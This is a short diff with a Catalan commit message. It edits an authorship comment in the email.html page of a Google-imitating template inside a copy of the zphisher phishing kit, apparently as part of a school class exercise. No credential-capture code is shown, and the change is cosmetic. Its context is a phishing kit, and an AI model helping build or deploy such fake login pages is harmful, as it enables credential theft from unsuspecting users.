modificacions del css 27/04 a les 12:18

--- a/zphisher-master/.sites/google_new/email.html
+++ b/zphisher-master/.sites/google_new/email.html
@@ -45,7 +45,7 @@
   </div>
   </div>
 </body>
-<!-- Codi fet per SMX2 / 26/04/2023  / Escola Ginebró -->
+<!-- Codi fet per SMX2 escola Ginebró 27/04/2023 -->
 
 
 </html>
